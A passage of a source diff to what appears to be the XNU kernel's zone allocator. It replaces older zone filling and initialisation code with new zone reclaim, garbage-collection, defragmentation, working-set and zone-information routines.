count, goal, freed = 0; + + goal = z->z_elems_rsv; + if (mode == ZONE_RECLAIM_TRIM) { + /* + * When trimming, only free elements in excess + * of the working set estimate. + * + * However if we are in a situation where the working + * set estimate is clearly growing, ignore the estimate + * as the next working set update will grow it and + * we want to avoid churn. + */ + goal = MAX(goal, MAX(z->z_elems_free_wss, + z->z_elems_free - z->z_elems_free_min)); + + /* + * Add some slop to account for "the last partial chunk in flight" + * so that we do not deplete the recirculation depot too harshly. + */ + goal += z->z_chunk_elems / 2; + } + + if (z->z_elems_free <= goal) { + break; } /* - * We cannot support elements larger than page size for foreign - * memory because we put metadata on the page itself for each - * page of foreign memory. 
+ * If we're above target, but we have no free page, then drain + * the recirculation depot until we get a free chunk or exhaust + * the depot. * - * We need to do this in order to be able to reach the metadata - * when any element is freed. + * This is rather abrupt but also somehow will reduce + * fragmentation anyway, and the zone code will import + * over time anyway. */ - assert(!zone->percpu && !zone->permanent); - assert(zone_elem_size(zone) <= PAGE_SIZE - sizeof(struct zone_page_metadata)); + while (z->z_recirc_cur) { + if (z->z_recirc_cur * zc_mag_size() <= goal && + !zone_pva_is_null(z->z_pageq_empty)) { + break; + } + if (freed >= zc_free_batch_size) { + zone_unlock(z); + thread_yield_to_preemption(); + zone_lock(z); + freed = 0; + /* we dropped the lock, needs to reassess */ + continue; + } + freed += zone_reclaim_recirc_magazine(z, &mags); + } - bzero((void *)newmem, size); + if (zone_pva_is_null(z->z_pageq_empty)) { + break; + } - for (vm_offset_t offs = 0; offs < size; offs += PAGE_SIZE) { - meta = (struct zone_page_metadata *)(newmem + offs); - *meta = (struct zone_page_metadata){ - .zm_index = zindex, - .zm_page_count = 1, - .zm_freelist_offs = empty_freelist_offs, - }; - meta->zm_foreign_cookie[0] = ZONE_FOREIGN_COOKIE; - zone_randomize_freelist(zone, meta, PAGE_SIZE, kind, - entropy_buffer); + meta = zone_pva_to_meta(z->z_pageq_empty); + count = (uint32_t)ptoa(meta->zm_chunk_len) / zone_elem_size(z); + + if (z->z_elems_free - count < goal) { + break; } + + zone_reclaim_chunk(z, meta, count); } -#if VM_MAX_TAG_ZONES - if (__improbable(zone->tags)) { - assert(kind == ZONE_ADDR_NATIVE && !zone->percpu); - ztMemoryAdd(zone, newmem, size); + zone_unlock(z); + + STAILQ_FOREACH_SAFE(mag, &mags, zm_link, tmp) { + zone_magazine_free(mag); } -#endif /* VM_MAX_TAG_ZONES */ +} +static void +zone_reclam_all(zone_reclaim_mode_t mode) +{ /* - * Insert the initialized pages / metadatas into the right lists. 
+ * Start with zones with VA sequester since depopulating + * pages will not need to allocate vm map entries for holes, + * which will give memory back to the system faster. */ - - lock_zone(zone); - assert(zone->z_self == zone); - - zone->page_count += pg_count; - if (zone->page_count_hwm < zone->page_count) { - zone->page_count_hwm = zone->page_count; + zone_foreach(z) { + if (z == zc_magazine_zone) { + continue; + } + if (z->z_va_sequester && z->collectable) { + zone_reclaim(z, mode); + } } - os_atomic_add(&zones_phys_page_count, pg_count, relaxed); - if (kind == ZONE_ADDR_NATIVE) { - os_atomic_add(&zones_phys_page_mapped_count, pg_count, relaxed); - if (zone->permanent) { - zone_meta_queue_push(zone, &zone->pages_intermediate, meta, kind); - } else { - zone_meta_queue_push(zone, &zone->pages_all_free, meta, kind); - zone->allfree_page_count += meta->zm_page_count; + zone_foreach(z) { + if (z == zc_magazine_zone) { + continue; } - free_count = zone_elem_count(zone, size, kind); - zone->countfree += free_count; - zone->countavail += free_count; - } else { - free_count = zone_elem_count(zone, PAGE_SIZE, kind); - for (vm_offset_t offs = 0; offs < size; offs += PAGE_SIZE) { - meta = (struct zone_page_metadata *)(newmem + offs); - zone_meta_queue_push(zone, &zone->pages_any_free_foreign, meta, kind); - zone->countfree += free_count; - zone->countavail += free_count; + if (!z->z_va_sequester && z->collectable) { + zone_reclaim(z, mode); } } - KDBG(MACHDBG_CODE(DBG_MACH_ZALLOC, ZALLOC_ZCRAM) | DBG_FUNC_END, zindex); + zone_reclaim(zc_magazine_zone, mode); } void -zcram(zone_t zone, vm_offset_t newmem, vm_size_t size) -{ - zcram_and_lock(zone, newmem, size); - unlock_zone(zone); -} - -/* - * Fill a zone with enough memory to contain at least nelem elements. - * Return the number of elements actually put into the zone, which may - * be more than the caller asked for since the memory allocation is - * rounded up to the next zone allocation size. 
- */ -int -zfill( - zone_t zone, - int nelem) +zone_gc(zone_gc_level_t level) { - kern_return_t kr; - vm_offset_t memory; - - vm_size_t alloc_size = ptoa(zone->alloc_pages); - vm_size_t nalloc_inc = zone_elem_count(zone, alloc_size, ZONE_ADDR_NATIVE); - vm_size_t nalloc = 0, goal = MAX(0, nelem); - int kmaflags = KMA_KOBJECT | KMA_ZERO; - - if (zone->noencrypt) { - kmaflags |= KMA_NOENCRYPT; - } - - assert(!zone->allows_foreign && !zone->permanent); + zone_reclaim_mode_t mode; - /* - * Trigger jetsams via the vm_pageout_garbage_collect thread if we're - * running out of zone memory - */ - if (is_zone_map_nearing_exhaustion()) { - thread_wakeup((event_t) &vm_pageout_garbage_collect); + switch (level) { + case ZONE_GC_TRIM: + mode = ZONE_RECLAIM_TRIM; + break; + case ZONE_GC_DRAIN: + mode = ZONE_RECLAIM_DRAIN; + break; + case ZONE_GC_JETSAM: + kill_process_in_largest_zone(); + mode = ZONE_RECLAIM_TRIM; + break; } - if (zone->va_sequester) { - lock_zone(zone); - - do { - struct zone_page_metadata *page_meta; - page_meta = zone_sequestered_page_get(zone, &memory); - if (NULL == page_meta) { - break; - } - unlock_zone(zone); - - kr = zone_sequestered_page_populate(zone, page_meta, - memory, alloc_size, kmaflags); - if (KERN_SUCCESS != kr) { - goto out_nolock; - } - - zcram_and_lock(zone, memory, alloc_size); - nalloc += nalloc_inc; - } while (nalloc < goal); - - unlock_zone(zone); - } + current_thread()->options |= TH_OPT_ZONE_PRIV; + lck_mtx_lock(&zone_gc_lock); -out_nolock: - while (nalloc < goal) { - kr = kernel_memory_allocate(submap_for_zone(zone), &memory, - alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE); - if (kr != KERN_SUCCESS) { - printf("%s: kernel_memory_allocate() of %lu bytes failed\n", - __func__, (unsigned long)(nalloc * alloc_size)); - break; - } + zone_reclam_all(mode); - zcram(zone, memory, alloc_size); - nalloc += nalloc_inc; + if (level == ZONE_GC_JETSAM && zone_map_nearing_exhaustion()) { + /* + * If we possibly killed a process, but we're still 
critical, + * we need to drain harder. + */ + zone_reclam_all(ZONE_RECLAIM_DRAIN); } - return (int)nalloc; + lck_mtx_unlock(&zone_gc_lock); + current_thread()->options &= ~TH_OPT_ZONE_PRIV; } -/* - * We're being very conservative here and picking a value of 95%. We might need to lower this if - * we find that we're not catching the problem and are still hitting zone map exhaustion panics. - */ -#define ZONE_MAP_JETSAM_LIMIT_DEFAULT 95 - -/* - * Trigger zone-map-exhaustion jetsams if the zone map is X% full, where X=zone_map_jetsam_limit. - * Can be set via boot-arg "zone_map_jetsam_limit". Set to 95% by default. - */ -TUNABLE_WRITEABLE(unsigned int, zone_map_jetsam_limit, "zone_map_jetsam_limit", - ZONE_MAP_JETSAM_LIMIT_DEFAULT); - void -get_zone_map_size(uint64_t *current_size, uint64_t *capacity) +zone_gc_trim(void) { - vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); - *current_size = ptoa_64(phys_pages); - *capacity = zone_phys_mapped_max; + zone_gc(ZONE_GC_TRIM); } void -get_largest_zone_info(char *zone_name, size_t zone_name_len, uint64_t *zone_size) +zone_gc_drain(void) { - zone_t largest_zone = zone_find_largest(); - - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - snprintf(zone_name, zone_name_len, "%s%s", - zone_heap_name(largest_zone), largest_zone->z_name); - - *zone_size = zone_size_wired(largest_zone); + zone_gc(ZONE_GC_DRAIN); } -boolean_t -is_zone_map_nearing_exhaustion(void) +static bool +zone_defrag_needed(zone_t z) { - vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); - return ptoa_64(phys_pages) > (zone_phys_mapped_max * zone_map_jetsam_limit) / 100; -} - + uint32_t recirc_size = z->z_recirc_cur * zc_mag_size(); -#define VMENTRY_TO_VMOBJECT_COMPARISON_RATIO 98 + if (recirc_size <= z->z_chunk_elems / 2) { + return false; + } + return recirc_size * zc_defrag_ratio > z->z_elems_free_wss * 100; +} -/* - * Tries to kill a single process if it can attribute 
one to the largest zone. If not, wakes up the memorystatus thread - * to walk through the jetsam priority bands and kill processes. +/*! + * @function zone_defrag_async + * + * @brief + * Resize the recirculation depot to match the working set size. + * + * @discussion + * When zones grow very large due to a spike in usage, and then some of those + * elements get freed, the elements in magazines in the recirculation depot + * are in no particular order. + * + * In order to control fragmentation, we need to detect "empty" pages so that + * they get onto the @c z_pageq_empty freelist, so that allocations re-pack + * naturally. + * + * This is done very gently, never in excess of the working set and some slop. */ static void -kill_process_in_largest_zone(void) +zone_defrag_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1) { - pid_t pid = -1; - zone_t largest_zone = zone_find_largest(); + zone_foreach(z) { + struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags); + zone_magazine_t mag, tmp; + uint32_t freed = 0, goal = 0; - printf("zone_map_exhaustion: Zone mapped %lld of %lld, used %lld, map size %lld, capacity %lld [jetsam limit %d%%]\n", - ptoa_64(os_atomic_load(&zones_phys_page_mapped_count, relaxed)), ptoa_64(zone_phys_mapped_max), - ptoa_64(os_atomic_load(&zones_phys_page_count, relaxed)), - (uint64_t)zone_submaps_approx_size(), - (uint64_t)zone_range_size(&zone_info.zi_map_range), - zone_map_jetsam_limit); - printf("zone_map_exhaustion: Largest zone %s%s, size %lu\n", zone_heap_name(largest_zone), - largest_zone->z_name, (uintptr_t)zone_size_wired(largest_zone)); + if (!z->collectable || !zone_defrag_needed(z)) { + continue; + } - /* - * We want to make sure we don't call this function from userspace. - * Or we could end up trying to synchronously kill the process - * whose context we're in, causing the system to hang. 
- */ - assert(current_task() == kernel_task); + zone_lock(z); - /* - * If vm_object_zone is the largest, check to see if the number of - * elements in vm_map_entry_zone is comparable. - * - * If so, consider vm_map_entry_zone as the largest. This lets us target - * a specific process to jetsam to quickly recover from the zone map - * bloat. - */ - if (largest_zone == vm_object_zone) { - unsigned int vm_object_zone_count = zone_count_allocated(vm_object_zone); - unsigned int vm_map_entry_zone_count = zone_count_allocated(vm_map_entry_zone); - /* Is the VM map entries zone count >= 98% of the VM objects zone count? */ - if (vm_map_entry_zone_count >= ((vm_object_zone_count * VMENTRY_TO_VMOBJECT_COMPARISON_RATIO) / 100)) { - largest_zone = vm_map_entry_zone; - printf("zone_map_exhaustion: Picking VM map entries as the zone to target, size %lu\n", - (uintptr_t)zone_size_wired(largest_zone)); + goal = z->z_elems_free_wss + z->z_chunk_elems / 2 + + zc_mag_size() - 1; + + while (z->z_recirc_cur * zc_mag_size() > goal) { + if (freed >= zc_free_batch_size) { + zone_unlock(z); + thread_yield_to_preemption(); + zone_lock(z); + freed = 0; + /* we dropped the lock, needs to reassess */ + continue; + } + freed += zone_reclaim_recirc_magazine(z, &mags); } - } - /* TODO: Extend this to check for the largest process in other zones as well. */ - if (largest_zone == vm_map_entry_zone) { - pid = find_largest_process_vm_map_entries(); - } else { - printf("zone_map_exhaustion: Nothing to do for the largest zone [%s%s]. 
" - "Waking up memorystatus thread.\n", zone_heap_name(largest_zone), - largest_zone->z_name); - } - if (!memorystatus_kill_on_zone_map_exhaustion(pid)) { - printf("zone_map_exhaustion: Call to memorystatus failed, victim pid: %d\n", pid); + zone_unlock(z); + + STAILQ_FOREACH_SAFE(mag, &mags, zm_link, tmp) { + zone_magazine_free(mag); + } } } -#pragma mark zalloc module init - -/* - * Initialize the "zone of zones" which uses fixed memory allocated - * earlier in memory initialization. zone_bootstrap is called - * before zone_init. - */ -__startup_func void -zone_bootstrap(void) +compute_zone_working_set_size(__unused void *param) { - /* Validate struct zone_page_metadata expectations */ - if ((1U << ZONE_PAGECOUNT_BITS) < - atop(ZONE_MAX_ALLOC_SIZE) * sizeof(struct zone_page_metadata)) { - panic("ZONE_PAGECOUNT_BITS is not large enough to hold page counts"); - } + uint32_t zc_auto = zc_auto_threshold; + bool kick_defrag = false; - /* Validate struct zone_packed_virtual_address expectations */ - static_assert((intptr_t)VM_MIN_KERNEL_ADDRESS < 0, "the top bit must be 1"); - if (VM_KERNEL_POINTER_SIGNIFICANT_BITS - PAGE_SHIFT > 31) { - panic("zone_pva_t can't pack a kernel page address in 31 bits"); + /* + * Keep zone caching disabled until the first proc is made. + */ + if (__improbable(zone_caching_disabled < 0)) { + return; } - zpercpu_early_count = ml_early_cpu_max_number() + 1; - - /* Set up zone element poisoning */ - zp_bootstrap(); + zone_caching_disabled = vm_pool_low(); +#if ZALLOC_EARLY_GAPS + zone_cleanup_early_gaps_if_needed(); +#endif - random_bool_init(&zone_bool_gen); + if (os_mul_overflow(zc_auto, Z_CONTENTION_WMA_UNIT, &zc_auto)) { + zc_auto = 0; + } - /* - * the KASAN quarantine for kalloc doesn't understand heaps - * and trips the heap confusion panics. At the end of the day, - * all these security measures are double duty with KASAN. - * - * On 32bit kernels, these protections are just too expensive. 
- */ -#if !defined(__LP64__) || KASAN_ZALLOC - zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER; - zsecurity_options &= ~ZSECURITY_OPTIONS_SUBMAP_USER_DATA; - zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER_KEXT_KALLOC; -#endif + zone_foreach(z) { + uint32_t wma; + bool needs_caching = false; - thread_call_setup(&call_async_alloc, zalloc_async, NULL); + if (z->z_self != z) { + continue; + } -#if CONFIG_ZCACHE - /* zcc_enable_for_zone_name=<zone>: enable per-cpu zone caching for <zone>. */ - if (PE_parse_boot_arg_str("zcc_enable_for_zone_name", cache_zone_name, sizeof(cache_zone_name))) { - printf("zcache: caching enabled for zone %s\n", cache_zone_name); - } -#endif /* CONFIG_ZCACHE */ -} + zone_lock(z); -#if __LP64__ -#if CONFIG_EMBEDDED -#define ZONE_MAP_VIRTUAL_SIZE_LP64 (32ULL * 1024ULL * 1024 * 1024) -#else -#define ZONE_MAP_VIRTUAL_SIZE_LP64 (128ULL * 1024ULL * 1024 * 1024) -#endif -#endif /* __LP64__ */ + wma = z->z_elems_free_max - z->z_elems_free_min; + wma = (3 * wma + z->z_elems_free_wss) / 4; + z->z_elems_free_max = z->z_elems_free_min = z->z_elems_free; + z->z_elems_free_wss = wma; -#define SINGLE_GUARD 16384 -#define MULTI_GUARD (3 * SINGLE_GUARD) + if (!kick_defrag && zone_defrag_needed(z)) { + kick_defrag = true; + } -#if __LP64__ -static inline vm_offset_t -zone_restricted_va_max(void) -{ - vm_offset_t compressor_max = VM_PACKING_MAX_PACKABLE(C_SLOT_PACKED_PTR); - vm_offset_t vm_page_max = VM_PACKING_MAX_PACKABLE(VM_PAGE_PACKED_PTR); + /* fixed point decimal of contentions per second */ + wma = z->z_contention_cur * Z_CONTENTION_WMA_UNIT / + ZONE_WSS_UPDATE_PERIOD; + z->z_contention_cur = 0; + z->z_contention_wma = (3 * wma + z->z_contention_wma) / 4; - return trunc_page(MIN(compressor_max, vm_page_max)); -} -#endif + /* + * If the zone seems to be very quiet, + * gently lower its cpu-local depot size. 
+ */ + if (z->z_pcpu_cache && wma < Z_CONTENTION_WMA_UNIT / 2 && + z->z_contention_wma < Z_CONTENTION_WMA_UNIT / 2) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + if (zc->zc_depot_max > zc_mag_size()) { + zc->zc_depot_max--; + } + } + } -__startup_func -static void -zone_tunables_fixup(void) -{ - if (zone_map_jetsam_limit == 0 || zone_map_jetsam_limit > 100) { - zone_map_jetsam_limit = ZONE_MAP_JETSAM_LIMIT_DEFAULT; - } -} -STARTUP(TUNABLES, STARTUP_RANK_MIDDLE, zone_tunables_fixup); + /* + * If the zone has been contending like crazy for two periods, + * and is eligible, maybe it's time to enable caching. + */ + if (!z->z_nocaching && !z->z_pcpu_cache && !z->exhaustible && + zc_auto && z->z_contention_wma >= zc_auto && wma >= zc_auto) { + needs_caching = true; + } -__startup_func -static vm_size_t -zone_phys_size_max(void) -{ - mach_vm_size_t zsize; - vm_size_t zsizearg; + zone_unlock(z); - if (PE_parse_boot_argn("zsize", &zsizearg, sizeof(zsizearg))) { - zsize = zsizearg * (1024ULL * 1024); - } else { - zsize = sane_size >> 2; /* Set target zone size as 1/4 of physical memory */ -#if defined(__LP64__) - zsize += zsize >> 1; -#endif /* __LP64__ */ + if (needs_caching) { + zone_enable_caching(z); + } } - if (zsize < CONFIG_ZONE_MAP_MIN) { - zsize = CONFIG_ZONE_MAP_MIN; /* Clamp to min */ - } - if (zsize > sane_size >> 1) { - zsize = sane_size >> 1; /* Clamp to half of RAM max */ - } - if (zsizearg == 0 && zsize > ZONE_MAP_MAX) { - /* if zsize boot-arg not present and zsize exceeds platform maximum, clip zsize */ - vm_size_t orig_zsize = zsize; - zsize = ZONE_MAP_MAX; - printf("NOTE: zonemap size reduced from 0x%lx to 0x%lx\n", - (uintptr_t)orig_zsize, (uintptr_t)zsize); + if (kick_defrag) { + thread_call_enter(&zone_defrag_callout); } - - assert((vm_size_t) zsize == zsize); - return (vm_size_t)trunc_page(zsize); } -__startup_func -static struct zone_map_range -zone_init_allocate_va(vm_offset_t *submap_min, vm_size_t size, bool guard) +#endif /* !ZALLOC_TEST */ 
+#pragma mark vm integration, MIG routines +#if !ZALLOC_TEST + +/* + * Creates a vm_map_copy_t to return to the caller of mach_* MIG calls + * requesting zone information. + * Frees unused pages towards the end of the region, and zero'es out unused + * space on the last page. + */ +static vm_map_copy_t +create_vm_map_copy( + vm_offset_t start_addr, + vm_size_t total_size, + vm_size_t used_size) { - struct zone_map_range r; - kern_return_t kr; + kern_return_t kr; + vm_offset_t end_addr; + vm_size_t free_size; + vm_map_copy_t copy; - if (guard) { - vm_map_offset_t addr = *submap_min; - vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + if (used_size != total_size) { + end_addr = start_addr + used_size; + free_size = total_size - (round_page(end_addr) - start_addr); - vmk_flags.vmkf_permanent = TRUE; - kr = vm_map_enter(kernel_map, &addr, size, 0, - VM_FLAGS_FIXED, vmk_flags, VM_KERN_MEMORY_ZONE, kernel_object, - 0, FALSE, VM_PROT_NONE, VM_PROT_NONE, VM_INHERIT_DEFAULT); - *submap_min = (vm_offset_t)addr; - } else { - kr = kernel_memory_allocate(kernel_map, submap_min, size, - 0, KMA_KOBJECT | KMA_PAGEABLE | KMA_VAONLY, VM_KERN_MEMORY_ZONE); - } - if (kr != KERN_SUCCESS) { - panic("zone_init_allocate_va(0x%lx:0x%zx) failed: %d", - (uintptr_t)*submap_min, (size_t)size, kr); + if (free_size >= PAGE_SIZE) { + kmem_free(ipc_kernel_map, + round_page(end_addr), free_size); + } + bzero((char *) end_addr, round_page(end_addr) - end_addr); } - r.min_address = *submap_min; - *submap_min += size; - r.max_address = *submap_min; + kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)start_addr, + (vm_map_size_t)used_size, TRUE, &copy); + assert(kr == KERN_SUCCESS); - return r; + return copy; } -__startup_func -static void -zone_submap_init( - vm_offset_t *submap_min, - unsigned idx, - uint64_t zone_sub_map_numer, - uint64_t *remaining_denom, - vm_offset_t *remaining_size, - vm_size_t guard_size) +static boolean_t +get_zone_info( + zone_t z, + mach_zone_name_t *zn, + 
mach_zone_info_t *zi) { - vm_offset_t submap_start, submap_end; - vm_size_t submap_size; - vm_map_t submap; - kern_return_t kr; - - submap_size = trunc_page(zone_sub_map_numer * *remaining_size / - *remaining_denom); - submap_start = *submap_min; - submap_end = submap_start + submap_size; + struct zone zcopy; + vm_size_t cached = 0; -#if defined(__LP64__) - if (idx == Z_SUBMAP_IDX_VA_RESTRICTED_MAP) { - vm_offset_t restricted_va_max = zone_restricted_va_max(); - if (submap_end > restricted_va_max) { -#if DEBUG || DEVELOPMENT - printf("zone_init: submap[%d] clipped to %zdM of %zdM\n", idx, - (size_t)(restricted_va_max - submap_start) >> 20, - (size_t)submap_size >> 20); -#endif /* DEBUG || DEVELOPMENT */ - guard_size += submap_end - restricted_va_max; - *remaining_size -= submap_end - restricted_va_max; - submap_end = restricted_va_max; - submap_size = restricted_va_max - submap_start; + assert(z != ZONE_NULL); + zone_lock(z); + if (!z->z_self) { + zone_unlock(z); + return FALSE; + } + zcopy = *z; + if (z->z_pcpu_cache) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + cached += zc->zc_alloc_cur + zc->zc_free_cur; + cached += zc->zc_depot_cur * zc_mag_size(); } - - vm_packing_verify_range("vm_compressor", - submap_start, submap_end, VM_PACKING_PARAMS(C_SLOT_PACKED_PTR)); - vm_packing_verify_range("vm_page", - submap_start, submap_end, VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR)); } -#endif /* defined(__LP64__) */ + zone_unlock(z); - vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; - vmk_flags.vmkf_permanent = TRUE; - kr = kmem_suballoc(kernel_map, submap_min, submap_size, - FALSE, VM_FLAGS_FIXED, vmk_flags, - VM_KERN_MEMORY_ZONE, &submap); - if (kr != KERN_SUCCESS) { - panic("kmem_suballoc(kernel_map[%d] %p:%p) failed: %d", - idx, (void *)submap_start, (void *)submap_end, kr); - } + if (zn != NULL) { + /* + * Append kalloc heap name to zone name (if zone is used by kalloc) + */ + char temp_zone_name[MAX_ZONE_NAME] = ""; + snprintf(temp_zone_name, MAX_ZONE_NAME, 
"%s%s", + zone_heap_name(z), z->z_name); -#if DEBUG || DEVELOPMENT - printf("zone_init: submap[%d] %p:%p (%zuM)\n", - idx, (void *)submap_start, (void *)submap_end, - (size_t)submap_size >> 20); -#endif /* DEBUG || DEVELOPMENT */ + /* assuming here the name data is static */ + (void) __nosan_strlcpy(zn->mzn_name, temp_zone_name, + strlen(temp_zone_name) + 1); + } - zone_submaps[idx] = submap; - *submap_min = submap_end; - *remaining_size -= submap_size; - *remaining_denom -= zone_sub_map_numer; + if (zi != NULL) { + *zi = (mach_zone_info_t) { + .mzi_count = zone_count_allocated(&zcopy) - cached, + .mzi_cur_size = ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_cur)), + // max_size for zprint is now high-watermark of pages used + .mzi_max_size = ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_hwm)), + .mzi_elem_size = zone_scale_for_percpu(&zcopy, zcopy.z_elem_size), + .mzi_alloc_size = ptoa_64(zcopy.z_chunk_pages), + .mzi_exhaustible = (uint64_t)zcopy.exhaustible, + }; + zpercpu_foreach(zs, zcopy.z_stats) { + zi->mzi_sum_size += zs->zs_mem_allocated; + } + if (zcopy.collectable) { + SET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable, + ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_empty))); + SET_MZI_COLLECTABLE_FLAG(zi->mzi_collectable, TRUE); + } + } - zone_init_allocate_va(submap_min, guard_size, true); + return TRUE; } -/* Global initialization of Zone Allocator. - * Runs after zone_bootstrap. 
- */ -__startup_func -static void -zone_init(void) +kern_return_t +task_zone_info( + __unused task_t task, + __unused mach_zone_name_array_t *namesp, + __unused mach_msg_type_number_t *namesCntp, + __unused task_zone_info_array_t *infop, + __unused mach_msg_type_number_t *infoCntp) { - vm_size_t zone_meta_size; - vm_size_t zone_map_size; - vm_size_t remaining_size; - vm_offset_t submap_min = 0; - - if (ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) { - zone_last_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP; - } else { - zone_last_submap_idx = Z_SUBMAP_IDX_GENERAL_MAP; - } - zone_phys_mapped_max = zone_phys_size_max(); + return KERN_FAILURE; +} -#if __LP64__ - zone_map_size = ZONE_MAP_VIRTUAL_SIZE_LP64; -#else - zone_map_size = zone_phys_mapped_max; -#endif - zone_meta_size = round_page(atop(zone_map_size) * - sizeof(struct zone_page_metadata)); +kern_return_t +mach_zone_info( + host_priv_t host, + mach_zone_name_array_t *namesp, + mach_msg_type_number_t *namesCntp, + mach_zone_info_array_t *infop, + mach_msg_type_number_t *infoCntp) +{ + return mach_memory_info(host, namesp, namesCntp, infop, infoCntp, NULL, NULL); +} - /* - * Zone "map" setup: - * - * [ VA_RESTRICTED ] <-- LP64 only - * [ SINGLE_GUARD ] <-- LP64 only - * [ meta ] - * [ SINGLE_GUARD ] - * [ map ] \ for each extra map - * [ MULTI_GUARD ] / - */ - remaining_size = zone_map_size; -#if defined(__LP64__) - remaining_size -= SINGLE_GUARD; -#endif - remaining_size -= zone_meta_size + SINGLE_GUARD; - remaining_size -= MULTI_GUARD * (zone_last_submap_idx - - Z_SUBMAP_IDX_GENERAL_MAP + 1); -#if VM_MAX_TAG_ZONES - if (zone_tagging_on) { - zone_tagging_init(zone_map_size); - } -#endif +kern_return_t +mach_memory_info( + host_priv_t host, + mach_zone_name_array_t *namesp, + mach_msg_type_number_t *namesCntp, + mach_zone_info_array_t *infop, + mach_msg_type_number_t *infoCntp, + mach_memory_info_array_t *memoryInfop, + mach_msg_type_number_t *memoryInfoCntp) +{ + mach_zone_name_t *names; + vm_offset_t 
names_addr; + vm_size_t names_size; - uint64_t remaining_denom = 0; - uint64_t zone_sub_map_numer[Z_SUBMAP_IDX_COUNT] = { -#ifdef __LP64__ - [Z_SUBMAP_IDX_VA_RESTRICTED_MAP] = 20, -#endif /* defined(__LP64__) */ - [Z_SUBMAP_IDX_GENERAL_MAP] = 40, - [Z_SUBMAP_IDX_BAG_OF_BYTES_MAP] = 40, - }; + mach_zone_info_t *info; + vm_offset_t info_addr; + vm_size_t info_size; - for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { -#if DEBUG || DEVELOPMENT - char submap_name[MAX_SUBMAP_NAME]; - snprintf(submap_name, MAX_SUBMAP_NAME, "submap%d", idx); - PE_parse_boot_argn(submap_name, &zone_sub_map_numer[idx], sizeof(uint64_t)); -#endif - remaining_denom += zone_sub_map_numer[idx]; - } + mach_memory_info_t *memory_info; + vm_offset_t memory_info_addr; + vm_size_t memory_info_size; + vm_size_t memory_info_vmsize; + unsigned int num_info; - /* - * And now allocate the various pieces of VA and submaps. - * - * Make a first allocation of contiguous VA, that we'll deallocate, - * and we'll carve-out memory in that range again linearly. - * The kernel is stil single threaded at this stage. - */ + unsigned int max_zones, used_zones, i; + mach_zone_name_t *zn; + mach_zone_info_t *zi; + kern_return_t kr; - struct zone_map_range *map_range = &zone_info.zi_map_range; + uint64_t zones_collectable_bytes = 0; - *map_range = zone_init_allocate_va(&submap_min, zone_map_size, false); - submap_min = map_range->min_address; - kmem_free(kernel_map, submap_min, zone_map_size); + if (host == HOST_NULL) { + return KERN_INVALID_HOST; + } +#if CONFIG_DEBUGGER_FOR_ZONE_INFO + if (!PE_i_can_has_debugger(NULL)) { + return KERN_INVALID_HOST; + } +#endif -#if defined(__LP64__) /* - * Allocate `Z_SUBMAP_IDX_VA_RESTRICTED_MAP` first because its VA range - * can't go beyond RESTRICTED_VA_MAX for the vm_page_t packing to work. + * We assume that zones aren't freed once allocated. + * We won't pick up any zones that are allocated later. 
*/ - zone_submap_init(&submap_min, Z_SUBMAP_IDX_VA_RESTRICTED_MAP, - zone_sub_map_numer[Z_SUBMAP_IDX_VA_RESTRICTED_MAP], &remaining_denom, - &remaining_size, SINGLE_GUARD); -#endif /* defined(__LP64__) */ - /* - * Allocate metadata array - */ - zone_info.zi_meta_range = - zone_init_allocate_va(&submap_min, zone_meta_size, true); - zone_init_allocate_va(&submap_min, SINGLE_GUARD, true); + max_zones = os_atomic_load(&num_zones, relaxed); - zone_info.zi_array_base = - (struct zone_page_metadata *)zone_info.zi_meta_range.min_address - - zone_pva_from_addr(map_range->min_address).packed_address; + names_size = round_page(max_zones * sizeof *names); + kr = kmem_alloc_pageable(ipc_kernel_map, + &names_addr, names_size, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + return kr; + } + names = (mach_zone_name_t *) names_addr; - /* - * Allocate other submaps - */ - for (unsigned idx = Z_SUBMAP_IDX_GENERAL_MAP; idx <= zone_last_submap_idx; idx++) { - zone_submap_init(&submap_min, idx, zone_sub_map_numer[idx], - &remaining_denom, &remaining_size, MULTI_GUARD); + info_size = round_page(max_zones * sizeof *info); + kr = kmem_alloc_pageable(ipc_kernel_map, + &info_addr, info_size, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + kmem_free(ipc_kernel_map, + names_addr, names_size); + return kr; } + info = (mach_zone_info_t *) info_addr; - vm_map_t general_map = zone_submaps[Z_SUBMAP_IDX_GENERAL_MAP]; - zone_info.zi_general_range.min_address = vm_map_min(general_map); - zone_info.zi_general_range.max_address = vm_map_max(general_map); + zn = &names[0]; + zi = &info[0]; - assert(submap_min == map_range->max_address); + used_zones = max_zones; + for (i = 0; i < max_zones; i++) { + if (!get_zone_info(&(zone_array[i]), zn, zi)) { + used_zones--; + continue; + } + zones_collectable_bytes += GET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable); + zn++; + zi++; + } -#if CONFIG_GZALLOC - gzalloc_init(zone_map_size); -#endif + *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, 
